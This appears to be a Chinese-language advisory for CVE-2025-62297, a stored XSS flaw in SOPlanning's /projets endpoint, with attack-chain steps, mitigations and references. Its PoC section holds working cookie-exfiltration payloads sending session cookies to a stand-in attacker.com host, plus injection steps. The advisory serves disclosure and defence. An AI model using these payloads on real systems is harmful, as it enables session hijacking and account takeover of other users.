CVE-2025-62297 SOPlanning存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-62297

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

SOPlanning

漏洞概述

CVE-2025-62297是SOPlanning项目管理系统中的一个存储型跨站脚本（Stored XSS）安全漏洞。该漏洞存在于SOPlanning的/projets端点，攻击者可以利用此漏洞在项目中注入恶意的HTML和JavaScript代码。由于漏洞类型为存储型，恶意代码会被永久保存在服务器端数据库中，所有访问该页面的用户都会受到攻击影响。攻击者需要具备中等权限（普通用户账户）即可实施攻击，但攻击成功后的影响范围覆盖所有访问被污染页面的用户。漏洞的利用过程中需要一定的用户交互，例如诱导受害者访问特定页面。该漏洞的危险性在于，攻击者可以通过注入的JavaScript代码窃取用户会话Cookie、劫持用户账户、进行钓鱼攻击或传播恶意软件。漏洞已于1.55版本中修复，建议所有使用SOPlanning的用户尽快升级到最新版本以消除安全风险。

技术细节

SOPlanning的/projets端点存在输入验证和输出编码不足的安全缺陷。攻击者通过该端点提交项目数据时，可以在项目名称、描述或其他可输入字段中嵌入恶意JavaScript代码。由于应用程序未对用户输入进行充分的过滤和转义处理，这些恶意代码被直接存储到数据库中。当其他用户访问包含恶意代码的项目页面时，浏览器会将其作为合法HTML/JavaScript执行，从而触发XSS攻击。攻击者可以利用此漏洞执行任意JavaScript操作，包括但不限于：读取页面DOM、窃取用户认证令牌、修改页面内容显示钓鱼信息、或将用户重定向到恶意网站。由于攻击发生在受害者浏览器中，攻击者可以绕过同源策略限制，获取目标用户在SOPlanning系统中的所有操作权限。修复此漏洞需要在服务器端对所有用户输入进行严格的输入验证，并在输出时对HTML特殊字符进行正确编码。

攻击链分析

STEP 1

步骤1

攻击者注册并登录SOPlanning系统，获取具有中等权限的普通用户账户

STEP 2

步骤2

攻击者访问/projets端点，进入项目创建或编辑页面

STEP 3

步骤3

在项目名称、描述或其他输入字段中注入恶意JavaScript或HTML代码作为XSS payload

STEP 4

步骤4

提交表单，恶意代码被存储到服务器数据库中，由于缺乏输入过滤，代码未被转义

STEP 5

步骤5

其他用户（受害者）访问包含恶意代码的项目页面

STEP 6

步骤6

受害者浏览器将恶意代码作为合法脚本执行，触发XSS攻击

STEP 7

步骤7

攻击者通过注入的脚本窃取用户Cookie、会话令牌或执行其他恶意操作

STEP 8

步骤8

攻击者利用窃取的凭证劫持用户账户，获取更高权限或敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-62297 PoC: Stored XSS in SOPlanning /projets endpoint -->
<!-- This PoC demonstrates the XSS vulnerability in SOPlanning -->

<!-- Method 1: Using img tag with onerror event -->
<img src=x onerror="this.src='https://attacker.com/log?cookie='+document.cookie">

<!-- Method 2: Using script tag -->
<script>fetch('https://attacker.com/steal?data='+btoa(document.cookie))</script>

<!-- Method 3: Using event handlers -->
<div onmouseover="alert(document.domain)">XSS Payload</div>

<!-- Recommended attack payload for session hijacking -->
<script>
  // Create image element to exfiltrate cookies
  var img = document.createElement('img');
  img.src = 'https://attacker.com/log?cookie=' + encodeURIComponent(document.cookie);
  document.body.appendChild(img);
  
  // Alternatively, send data via fetch API
  fetch('https://attacker.com/exfil', {
    method: 'POST',
    mode: 'no-cors',
    body: JSON.stringify({
      cookies: document.cookie,
      url: window.location.href,
      userAgent: navigator.userAgent
    })
  });
</script>

<!-- Steps to exploit:
1. Authenticate with medium privileges account
2. Navigate to /projets endpoint
3. Create or edit a project
4. Inject XSS payload in project name/description field
5. Save the project
6. When any user views the project, the XSS will execute
-->

影响范围

SOPlanning < 1.55

防御指南

临时缓解措施

如果无法立即升级到最新版本，可以采取以下临时缓解措施：1) 限制低权限用户创建和编辑项目的功能；2) 在Web应用防火墙（WAF）层面配置XSS防护规则，过滤恶意请求；3) 启用浏览器的XSS过滤器（虽然可能被绕过）；4) 监控/projets端点的访问日志，及时发现异常请求；5) 对现有项目数据进行安全扫描，查找潜在的XSS payload。建议尽快安排计划升级到1.55版本以彻底修复此漏洞。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-62297
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-62297
3 Details https://www.cvedetails.com/cve/CVE-2025-62297/
4 VulDB https://vuldb.com/cve/CVE-2025-62297
5 Link https://cert.pl/en/posts/2025/11/CVE-2025-62293
6 Link https://www.soplanning.org/en/